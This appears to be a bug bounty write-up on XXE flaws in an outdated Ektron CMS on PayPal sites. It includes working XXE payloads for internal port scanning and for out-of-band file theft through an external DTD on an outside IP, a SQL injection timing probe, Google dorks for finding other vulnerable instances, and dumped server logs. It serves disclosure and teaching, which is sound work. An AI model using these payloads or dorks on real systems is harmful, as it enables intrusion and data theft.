Escolar Documentos
Profissional Documentos
Cultura Documentos
XXE
Sean Melia @seanmeals
https://www.linkedin.com/in/meliasean
https://www.hackerone.com/meals
Introduction
I was able to find three XML External Entity (XXE) attacks on PayPals externally
facing sites. The vulnerabilities are related to Ektron CMS which has been notorious
for vulnerabilities. Paypal was running an older version of Ektron which left the web
services exposed.
Heres the write up!
Exploit
Google Dork to find some PayPal services running Ektron:
inurl:robots.txt intext:Disallow: /workarea/ site:*.paypal.*
https://www.paypal.fr/WorkArea/webservices/SearchService.asmx?op=ExecuteSe
arch
Many of the web services require authentication, however the search functions do
not! Surprisingly these are the functions that are using a vulnerable XML parser!
By submitting the query parameter with a blank value I was presented with an error
referencing LoadXml, which in the past has been vulnerable to XXE.
I then submitted some XML to test if I could scan ports on their internal
servers/networks. I was able to!
Payload: query=<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [
<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://127.0.0.1:80"
>]><foo>&xxe;</foo>
Port 80 response shows there is a service listening:
Port 22 response shows there is no service listening:
Change the port number to whatever port you would like to scan or run it through
intruder and do an automated port scan. Compare the response sizes and content to
determine which ports have a service listening on them. Anything with a response
size different from 2453 shows that there is a service listening.
This can be used to enumerate services listening internally that may be vulnerable
to SQL injection or command execution via GET parameters in the URL. E.g.
http://10.10.10.67:9999/?id= waitfor delay00:00:10-- -
This attack can also connect to Windows Shares. An attacker can scan the internal
network and look for open shares containing sensitive documents.
Payload: query=<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE roottag [
<!ENTITY % file SYSTEM "\\localhost\Admin$"> <!ENTITY % dtd SYSTEM
"http://104.236.212.244/evil1.dtd"> %dtd;]><roottag>&send;</roottag>
I can also read local files off of the webserver using an out-of-band method by
hosting an external DTD.
External .dtd file that I am referencing from my server:
The win.ini file outputted to my server logs:
URL Decoded output:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Some various log files found on windows systems that I was able to pull as well:
C:\windows\security\logs\scecomp.old
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\System\CurrentControlSet\Services\Tcpip
Security=D:P(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;CCLCSWRPRC;;;
NS)(A;CI;KR;;;LS)(A;CI;CCLCSWRPRC;;;NO)(A;CI;CCLCSWRPRC;;;S-1-5-802940520708-3855866260-481812779-327648279-1710889582)(A;CIIO;RC;;;OW)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\System\CurrentControlSet\Services\Tcpip\ServiceProvider
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Tcpip\ServiceProvider
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GRLCSWCCRPR
C;;;NS)(A;CI;GR;;;LS)(A;CI;CCLCSWRPRC;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\System\CurrentControlSet\Control\Network
Security=D:PAI(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;
KA;;;NS)(A;CI;KA;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPSDRC;;;
S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CIIO;RC;;;OW)(A;CI;KA;;;SU)(A;CI;KA;;;S-1-5-80-28986496042335086160-1904548223-3761738420-3855444835)(A;CIIO;RC;;;S-1-3-4)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Tcpip\Linkage
Security=D:PAI(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;
KA;;;NS)(A;CI;KA;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPSDRC;;;
S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CIIO;RC;;;OW)(A;CI;KA;;;SU)(A;CI;KA;;;S-1-5-80-28986496042335086160-1904548223-3761738420-3855444835)(A;CIIO;RC;;;S-1-3-4)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
Security=D:P(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;CCDCLCSWRP
WPSDRC;;;NS)(A;CI;KR;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPS
DRC;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CIIO;RC;;;OW)(A;CI;KRKW;;;S-1-5-80-3981856537-5817756231136376035-2066872258-409572886)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Adapters
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G
RLCSWCCRPRC;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CI;GR;;;LS)(A;CI;GR;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parametersv6
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G
RLCSWCCRPRC;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CI;GR;;;LS)(A;CI;GR;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Dhcp\Configurations
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G
A;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CI;GR;;;LS)(A;CI;GA;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters\Options
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G
A;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CI;GR;;;LS)(A;CI;GA;;;NO)
03/05/2011 15:15:47
Succeed
Update
Key
MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parametersv6\Options
Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G
A;;;S-1-5-80-2940520708-3855866260-481812779-3276482791710889582)(A;CI;GR;;;LS)(A;CI;GA;;;NO)
C:\windows\security\logs\scesrv.log
-------------------------------------------
Wednesday, June 11, 2014 1:54:02 AM
----Configuration engine was initialized successfully.----
----Reading Configuration Template info...
----Configure User Rights...
SeImpersonatePrivilege must be assigned to administrators. This
setting is adjusted.
SeImpersonatePrivilege must be assigned to SERVICE. This setting is
adjusted.
Configure S-1-5-19.
Configure S-1-5-20.
Configure S-1-5-21-3982848173-2833271265-4254726511-1004.
Configure S-1-5-80-3880006512-4290199581-1648723128-35698697373631323133.
Configure S-1-5-82-1078778675-3072034145-2029527255-5070158381043371142.
Configure S-1-5-82-145413143-1359051115-2505700303-4160712981291788329.
Configure S-1-5-82-2996991680-68878715-1649194708-14068111872978222158.
Configure S-1-5-82-4280230437-51877121-4113000123-33688648871387175710.
Configure S-1-5-82-606752505-1068012140-2233443849-24379493461804447525.
Configure S-1-5-32-544.
Configure S-1-5-32-551.
Configure S-1-5-32-559.
Configure S-1-5-32-568.
Configure S-1-1-0.
Configure S-1-5-32-545.
Configure S-1-5-6.
Configure S-1-5-21-3982848173-2833271265-4254726511-1008.
Configure S-1-5-32-555.
Configure S-1-5-80-0.
Configure S-1-5-80-3139157870-2983391045-3678747466-6587257121809340420.
User Rights configuration was completed successfully.
----Un-initialize configuration engine...
Conclusion
The impact of this XXE is that a persistent attacker can find the location of sensitive
files such as web.config and steal private information from PayPal. They can then
use this information and other information retrieved from other configuration files
to pivot to other services that PayPal uses to hold internal and customer data.
Additional Info
Google Dorks to find other Ektron instances
1. inurl:/WorkArea/webservices/
2. inurl:robots.txt intext:Disallow: /workarea/
Resources
http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing